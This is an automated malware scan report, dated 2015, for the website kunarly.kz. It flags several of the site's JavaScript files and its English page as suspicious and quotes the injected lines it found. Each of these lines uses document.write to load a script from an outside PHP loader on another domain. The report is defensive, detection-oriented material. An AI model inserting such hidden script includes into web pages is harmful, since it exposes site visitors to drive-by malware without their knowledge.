Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kunarly.kz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kunarly.kz/ | 200 Ok Content-Length: 26500 Content-Type: text/html | clean |
http://kunarly.kz/js/cross-domain.php | 200 OK Content-Length: 2032 Content-Type: text/javascript | clean |
http://kunarly.kz/js/swfobject.js | 200 OK Content-Length: 6100 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pierrevdluytgaarden.nl/84cJfDM7.php?id=6063067"></script>');
| ||
http://kunarly.kz/js/block.js | 200 OK Content-Length: 915 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pierrevdluytgaarden.nl/84cJfDM7.php?id=6063059"></script>');
| ||
http://kunarly.kz/js/jquery/jquery.js | 200 OK Content-Length: 72320 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pierrevdluytgaarden.nl/84cJfDM7.php?id=6063124"></script>');
| ||
http://kunarly.kz/js/guest.js | 200 OK Content-Length: 10191 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://pierrevdluytgaarden.nl/84cJfDM7.php?id=6063064"></script>');
| ||
http://counter.rambler.ru/top100.jcn?1928889 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://kunarly.kz/kontakty/ | 200 Ok Content-Length: 26507 Content-Type: text/html | clean |
http://kunarly.kz/content/sitemap/ | 200 Ok Content-Length: 20710 Content-Type: text/html | clean |
http://kunarly.kz/users/login_do/ | 200 Ok Content-Length: 20223 Content-Type: text/html | clean |
http://kunarly.kz/kz/ | 404 Not Found Content-Length: 21114 Content-Type: text/html | clean |
http://kunarly.kz/eng/ | 200 Ok Content-Length: 2255 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pierrevdluytgaarden.nl/84cJfDM7.php?id=6063051"></script> | ||
http://umi-cms.ru/install/js/jquery-1.4.2.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 14:25:01 GMT Location: http://www.umi-cms.ru/install/js/jquery-1.4.2.min.js Server: nginx Content-Length: 260 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: umicms_session=Ti4x+FSyh7263hxYCBkHAg==; path=/ | clean |
http://www.umi-cms.ru/install/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://umi-cms.ru/install/js/jquery.corner.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 14:25:02 GMT Location: http://www.umi-cms.ru/install/js/jquery.corner.js Server: nginx Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: umicms_session=Ti4x+FSyh7663hxYCBkJAg==; path=/ | clean |
http://www.umi-cms.ru/install/js/jquery.corner.js | 200 OK Content-Length: 11181 Content-Type: text/javascript | clean |
http://kunarly.kz/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate Connection: close Date: Sun, 11 Jan 2015 14:25:01 GMT Pragma: no-cache Location: /test404page.js/ Server: nginx Content-Length: 45 Content-Type: text/html; charset=utf-8 Expires: Sun, 11 Jan 2015 14:25:01 GMT Set-Cookie: PHPSESSID=avr3sa4fnuu0kd5mv0p4iudsn0; path=/ Set-Cookie: stat_id=avr3sa4fnuu0kd5mv0p4iudsn0; expires=Sat, 11-Jan-2025 14:25:01 GMT; path=/ Status: 301 Moved Permanently X-CMS-Version: 2.8.4.1 X-Generated-By: UMI.CMS X-Powered-By: PHP/5.4.36 X-XSS-Protection: 0 | clean |
http://kunarly.kz/test404page.js/ | 404 Not Found Content-Length: 21126 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kunarly.kz
Result:
HTTP/1.1 200 Ok
Cache-Control: no-store, no-cache, must-revalidate
Connection: close
Date: Sun, 11 Jan 2015 14:24:50 GMT
Pragma: no-cache
Server: nginx
Content-Length: 26500
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Jan 2015 14:24:50 GMT
Set-Cookie: PHPSESSID=vjpslulu7cpv794ce05r9nhn77; path=/
Set-Cookie: stat_id=vjpslulu7cpv794ce05r9nhn77; expires=Sat, 11-Jan-2025 14:24:50 GMT; path=/
Set-Cookie: stat_id=vjpslulu7cpv794ce05r9nhn77; expires=Wed, 08-Jan-2025 14:24:50 GMT; path=/
Set-Cookie: stat_id=vjpslulu7cpv794ce05r9nhn77; expires=Sat, 11-Jan-2025 14:24:50 GMT; path=/
Status: 200 Ok
X-CMS-Version: 2.8.4.1
X-Generated-By: UMI.CMS
X-Powered-By: PHP/5.4.36
X-XSS-Protection: 0
...26500 bytes of data.
GET / HTTP/1.1
Host: kunarly.kz
Result:
HTTP/1.1 200 Ok
Cache-Control: no-store, no-cache, must-revalidate
Connection: close
Date: Sun, 11 Jan 2015 14:24:50 GMT
Pragma: no-cache
Server: nginx
Content-Length: 26500
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Jan 2015 14:24:50 GMT
Set-Cookie: PHPSESSID=vjpslulu7cpv794ce05r9nhn77; path=/
Set-Cookie: stat_id=vjpslulu7cpv794ce05r9nhn77; expires=Sat, 11-Jan-2025 14:24:50 GMT; path=/
Set-Cookie: stat_id=vjpslulu7cpv794ce05r9nhn77; expires=Wed, 08-Jan-2025 14:24:50 GMT; path=/
Set-Cookie: stat_id=vjpslulu7cpv794ce05r9nhn77; expires=Sat, 11-Jan-2025 14:24:50 GMT; path=/
Status: 200 Ok
X-CMS-Version: 2.8.4.1
X-Generated-By: UMI.CMS
X-Powered-By: PHP/5.4.36
X-XSS-Protection: 0
...26500 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kunarly.kz
Referer: http://www.google.com/search?q=kunarly.kz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kunarly.kz
Referer: http://www.google.com/search?q=kunarly.kz
Result:
The result is similar to the first query. There are no suspicious redirects found.